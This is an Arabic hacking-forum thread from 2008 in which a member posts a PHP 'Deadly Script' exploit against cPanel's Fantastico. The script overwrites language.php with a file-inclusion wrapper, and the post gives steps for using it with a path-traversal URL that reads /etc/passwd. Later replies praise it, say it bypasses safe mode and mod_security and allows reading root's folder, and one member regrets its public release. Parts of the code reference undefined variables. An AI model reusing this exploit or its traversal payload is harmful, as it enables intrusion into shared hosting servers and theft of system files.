Cpanel fantastico Privilege Escalation "ModSec and PHP restriction Bypass"

Super-Crystal · #1 11-29-2008, 06:58 PM

كود PHP:


			
<?php

/*

######################################## 

# Deadly Script  by Super-Crystal 

# bypass Cpanel fantastico 

# www.arab4services.net

#        ##e-mail : l1un@hotmail.com , i-1@hotmail.com##

#######################################

*/

set_time_limit(0);

if(isset($_POST['sup3r'])) {

if(stristr(php_uname(),"2.6.") && stristr(php_uname(),"Linux")) {

$phpwrapper = '<?php

include_once("./language/".$_GET[sup3r].".php"); 

?>

';

fwrite($h,$prctl);

fclose($h);

$handle = fopen($_POST['php'], "w");

fwrite($handle, $phpwrapper);

fclose($handle);

echo "Building exploit...<br />";

echo "coding by Super-Crystal <br />";

echo "Cleaning up<br />";

echo "Done!<br />

</pre>";

} else {

echo "error : ".php_uname();

}

} else {

?>

<div align="center">

<h3>Deadly Script</h3>

<font color=red>Cpanel fantastico Privilege Escalation "ModSec and PHP restriction Bypass"</font><br />

<pre><div align="center">

</pre></div><br />

<table border="0" cellspacing="0">

<tr>

<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">

<table border="0" cellspacing="0">

<tr>

<td><div align="right">Exploit:</div></td>

<td>

<select name="exploit">

<option selected="selected">Cpanel fantastico Privilege Escalation "ModSec and PHP restriction Bypass"</option>

</select>

</td>

</tr>

<tr>

<td><div align="right">change</div></td>

<td><input type="text" name="php" size="50" value="<?php echo getcwd()."/language.php" ?>" /></td>

</tr>

<tr>

</table>

</div>

<input type="hidden" name="sup3r" value="doit" />

<input name="submit" type="submit" value="Submit" /><br />

1- change /home/[user]/.fantasticodata/language.php

<br />

2- click on the submit

<br />

3- now put it like this (e.g) 

: http://www.xxxx.com:2082/frontend/x3/fantastico/index.php?sup3r=../../../../../../etc/passwd%00 .

<br />

<font color=red>Written: 10.10.2008</font><br />

<font color=blue>Public: 26.11.2008</font><br />

<div align="center">

<font color=red>Author : Super-Crystal</font><br />

<a href="http://www.arab4services.net">Arab4services.net </a></center>

</div>

</form>

<?php } ?>

اي استفسارات ؟

أبونجم · #2 11-29-2008, 07:05 PM

و أعاد احيائها :d

قدها يابوروان

خويك بونجم

sarbot511 · #3 11-29-2008, 07:14 PM

ابدااااع ما شااء الله انا كنت منتضر هالشئ تسلم .!!

iاعتقد ان الملف يغنيك عن الثغرة الي بالسيبنل وطريقت استغلالها الط
ويلة تسلم وما قصرت

KSA-Devil · #4 11-29-2008, 11:48 PM

اخيرا سوبر فضيت لسي بنل

يعطيك الف عافيه

تسلم على هذا الثغره بجربها

Super-Crystal · #5 11-30-2008, 01:48 AM

ابونجم سربوت فهد حياكم الله منورين

بالنسبة للبعض يستفسر بالايميل عن الثغره مع اني كتبت فوق اي استفسارات ضعها هنا ...

عالعموم الاستثمار
/home/[user]/.fantasticodata/language.php
بعدها يتم تلغيم السي بنل (فنتاستكو) بثغره لوكال انكلود ..

مميزاتها
1- سيف مود اوف
2- دوال غير محجوبه
3- مود سكيورتي اوف
4- تقراء مجلد الروت

NooFa · #6 11-30-2008, 11:03 PM

قواك الله سوبر تمنيت بصراحه انك مانزلتها للعامه الله يكون بعون السيرفرات العربية

هكر المقدس · #7 12-01-2008, 12:33 AM

مشكور صديقي Super-Crystal على الموضوع رائع

المشاركة الأصلية بواسطة NooFa

قواك الله سوبر تمنيت بصراحه انك مانزلتها للعامه الله يكون بعون السيرفرات العربية

بحب احكيلك شغله صديقي شو بدك تعمل فيها لو ضلت معك صرت اكره شي اسمه برايف يا اخي خلي الاعضاء تتعلم ليش كتم العلم وشكرا

دمعة فحل · #8 12-01-2008, 09:06 AM

كثر خيرك سوبر وعساك على القوه

Saudi Scorpion · #9 12-02-2008, 10:21 AM

عوافي يا شنب

AnGeR_HaCkEr · #10 12-02-2008, 10:35 PM

ابدااااع ما شااء الله

مواضيع مشابهة
الموضوع	كاتب الموضوع	المنتدى	الردود	آخر مشاركة
Cpanel fantastico Privilege Escalation "ModSec and PHP restriction Bypass"	Super-Crystal	إكتشافاتنا [Exploits]	13	12-11-2008 10:20 PM

خيارات الموضوع	بحث في هذا الموضوع
عرض نسخة للطّباعة أرسل هذه الصفحة لصديق	بحث في هذا الموضوع: بحث متقدم
طريقة العرض	قيّم هذا الموضوع
النمط الخطي التحويل إلى النمط الشجري التحويل إلى النمط المتطوّر	قيّم هذا الموضوع:

عدد الأعضاء الذي يتصفحون هذا الموضوع : 1 (0 عضو و 1 ضيف)